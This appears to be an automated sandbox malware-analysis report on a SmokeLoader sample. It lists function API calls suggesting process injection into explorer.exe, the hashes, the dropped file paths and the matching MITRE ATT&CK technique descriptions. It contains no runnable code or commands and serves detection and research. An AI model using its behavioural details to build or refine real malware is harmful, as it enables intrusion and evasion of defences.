Opcode Fuzzy Hash: 14645345394e90a75995924441b82a651fb364d78d7be7356862ca363e07ea2f
Instruction Fuzzy Hash: A3F09672811318FFDB10CF919D5C8AEBBBCEE09292F10025AE90593190D7304F08A7A0

Function 005517DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13

GetLocalTime.KERNEL32(?,00000000), ref: 005517F3
wsprintfW.USER32 ref: 0055181D

Strings

[%02d.%02d.%d %02d:%02d:%02d], xrefs: 00551817

Memory Dump Source

Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_551000_explorer.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: [%02d.%02d.%d %02d:%02d:%02d]
API String ID: 377395780-613334611
Opcode ID: 85ffef8e13a2dd334ce464acdd1b648aefd2463065237041746d35c4b0b3dc22
Instruction ID: 973ac10a75ff935e5c9dc560d4081d0ce02158eb87fdad54e7118d846b3e73c1
Opcode Fuzzy Hash: 85ffef8e13a2dd334ce464acdd1b648aefd2463065237041746d35c4b0b3dc22
Instruction Fuzzy Hash: 3DF03761900128BAC71457DA9C558FFB7FCEB0C742F00015BFE45D1180E5785A54D3B5

Analysis Process: explorer.exePID: 5268, Parent PID: 2580COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00FC370C Relevance: 1.6, APIs: 1, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00FC378C

Memory Dump Source

Source File: 00000015.00000002.4175091353.0000000000FC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_fc1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction ID: 1c2d18e5ad58739d1eebb53d340d5e12c685f09336f38e8cccf50b869a23d624
Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction Fuzzy Hash: FF11E674A0590A0FFB5CFB78999EB7533D1FB44312F54802EA815C72A2DE3DCA909300

Function 00FCB4A8 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00FCB5A7
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00FCB651
VirtualProtect.KERNELBASE ref: 00FCB66F

Memory Dump Source

Source File: 00000015.00000002.4175091353.0000000000FCA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FCA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_fca000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction ID: 0c9a4214d8b94e4c99022b6da7ce01d6cc2ca00752c537226efb0a7cde00d833
Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction Fuzzy Hash: 77517A36B5891F4BCB24AA789D87BF4B7C1F755335F1C0A2EC48AC3289D759C846A381

Function 00FC34C4 Relevance: 3.2, APIs: 2, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FC1BF8: OpenFileMappingA.KERNEL32 ref: 00FC1C0F
Part of subcall function 00FC1BF8: MapViewOfFile.KERNELBASE ref: 00FC1C2E

SysFreeMap.PGOCR ref: 00FC36F7
SleepEx.KERNELBASE ref: 00FC3701

Memory Dump Source

Source File: 00000015.00000002.4175091353.0000000000FC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_fc1000_explorer.jbxd

Similarity

API ID: File$FreeMappingOpenSleepView
String ID:
API String ID: 4205437007-0
Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction ID: 4e027fb55c6863e8b0d8ebad822d82ab0bbd41691bd18e88c503471dd632914c
Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction Fuzzy Hash: AD51A630608A098FDB19FB28DD5AFAA73E1FB95350F44461DE44BC32A2DF38DA159781

Function 00FC1BF8 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 00FC1C0F
MapViewOfFile.KERNELBASE ref: 00FC1C2E

Memory Dump Source

Source File: 00000015.00000002.4175091353.0000000000FC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_fc1000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction ID: ffd9cd7256469e67a6c5fe8db13535bd9f2f1ccd79929ed5c11a8877a6105e38
Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction Fuzzy Hash: A1F08234314F0D4FAB44EF7C9C9C235B7E0EBA8202740857EA84AC6165EF34C8408701

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report v173TV3V11.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\451E.exe

C:\Users\user\AppData\Local\Temp\9AAA.tmp

C:\Users\user\AppData\Local\Temp\9AAA.tmp-shm

C:\Users\user\AppData\Local\Temp\9E35.tmp

C:\Users\user\AppData\Local\Temp\A115.tmp

C:\Users\user\AppData\Local\Temp\A481.tmp

C:\Users\user\AppData\Local\Temp\A4FF.tmp

C:\Users\user\AppData\Local\Temp\A5FA.tmp

C:\Users\user\AppData\Local\Temp\A6F5.tmp

C:\Users\user\AppData\Local\Temp\C35.exe

C:\Users\user\AppData\Roaming\bsjhhuh

Windows Analysis Report
v173TV3V11.exe

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre